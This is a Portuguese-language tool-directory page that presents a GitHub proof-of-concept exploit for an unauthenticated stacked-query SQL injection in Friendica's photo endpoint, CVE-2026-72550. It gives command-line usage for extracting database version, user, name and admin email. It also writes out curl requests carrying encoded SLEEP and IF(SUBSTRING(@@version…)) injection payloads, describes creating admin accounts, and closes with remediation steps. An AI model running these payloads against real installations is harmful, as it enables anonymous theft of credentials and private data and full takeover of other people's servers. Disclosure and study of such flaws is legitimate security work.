Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/abdugafforov-bobur/cve-2026-72550-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesSegurança WebTestes de Penetração
GitHub
abdugafforov-bobur/cve-2026-72550-poc

CVE-2026-72550-poc

CVE-2026-72550 — PoC de Injeção SQL de Consulta Empilhada Não Autenticada no Friendica (CVSS 9.8 Crítico)

Ver Repositório
15há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-72550 — Injeção de SQL não autenticada no Friendica

Uma injeção de SQL não autenticada com consultas empilhadas (stacked queries) no endpoint de fotos do Friendica permite que qualquer visitante execute SQL arbitrário.

CampoValor
ID CVECVE-2026-72550
ProdutoFriendica (rede social federada auto-hospedada)
Afetado<= 2026.08-dev (git HEAD e3fc1bc)
TipoCWE-89: Injeção de SQL (não autenticada, consultas empilhadas)
GravidadeCrítica — CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Autenticação necessáriaNenhuma

Resumo

O endpoint de visualização de fotos no Friendica recebe o parâmetro de consulta order e o concatena, sem escape, em uma instrução SHOW COLUMNS ... LIKE '...' executada por meio de um simples PDO::query() — que permite múltiplas instruções. Nenhum login é necessário e, em uma instalação padrão (block_public desativado por padrão), qualquer foto publicamente visível é suficiente. Como o PDO::query() executa instruções empilhadas, um atacante anônimo não apenas lê dados — ele executa SQL arbitrário, incluindo INSERT/UPDATE para criar um usuário admin.

Caminho de Código Vulnerável

mod/photos.php:673              — reads raw $_GET['order']
DBStructure::existsColumn()     — concatenates into: SHOW COLUMNS FROM `photo` LIKE '$column'
  src/Database/DBStructure.php:714
DBA::p() → PDO::query()         — executes with stacked statements enabled

O caminho de requisição padrão chega a este código: $cmd assume o padrão 'view' (satisfazendo a verificação $cmd === 'view') e no_count está desativado, portanto nenhuma autenticação e nenhuma configuração não padrão são necessárias.

Uso

# Install dependency
pip install requests

# Check if target is vulnerable (time-based detection)
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --check-only

# Extract database version via blind SQLi
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract version

# Extract current database user
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_user

# Extract current database name
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_name

# Extract first admin email
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract admin_email

Parâmetros

FlagDescrição
-u / --urlURL base do alvo (ex.: http://target:8176)
-r / --userNome de usuário cuja galeria de fotos será acessada
-i / --resource-idID do recurso de qualquer foto publicamente visível
--extractValor a exfiltrar: version, db_user, db_name, admin_email
--check-onlyApenas testa a vulnerabilidade, sem extrair dados
--sleepAtraso do SLEEP em segundos (padrão: 5)

Reprodução Manual

Não são necessários cookies nem autenticação. Aponte para qualquer resource-id de foto pública:

# Control — valid order, returns fast (~0.05s)
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=created"

# Injection — stacked SLEEP(5) executes, response held ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20SLEEP(5)--%20-"

Payload decodificado: x';SELECT SLEEP(5)-- -

O SQL injetado torna-se:

SHOW COLUMNS FROM `photo` LIKE 'x';SELECT SLEEP(5)-- -'

Extração Booleana Cega

# TRUE condition (@@version starts with '1') → delays ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%271%27,SLEEP(5),0)--%20-"

# FALSE condition (@@version starts with '9') → returns fast
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%279%27,SLEEP(5),0)--%20-"

Impacto

Um atacante não autenticado pode:

  • Ler quaisquer dados do banco de dados (extração cega de credenciais, e-mails, mensagens privadas)
  • Escrever linhas arbitrárias — incluindo criar uma conta de administrador via INSERT INTO user
  • Modificar dados existentes — elevar qualquer usuário a admin, adulterar publicações, redefinir senhas
  • Excluir dados ou remover tabelas (negação de serviço)

Trata-se de um comprometimento total do banco de dados, alcançável por qualquer visitante anônimo em uma instalação padrão do Friendica.

Correção

  1. Valide order contra a lista branca de colunas conhecidas antes do uso
  2. Use consultas parametrizadas em vez de concatenação de strings em SHOW COLUMNS
  3. Desative a execução de múltiplas instruções na conexão PDO (PDO::ATTR_EMULATE_PREPARES => false)

Linha do Tempo

DataEvento
2026-07-07Vulnerabilidade descoberta e confirmada em instância local
2026-08-11CVE-2026-72550 publicado via CNA TuranSec

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. Utilize-a somente contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O autor não se responsabiliza pelo uso indevido.

Créditos

Descoberto por Bobur Abdugafforov (@abdugafforov-bobur)

CVE atribuído via CNA TuranSec

Baixar ferramenta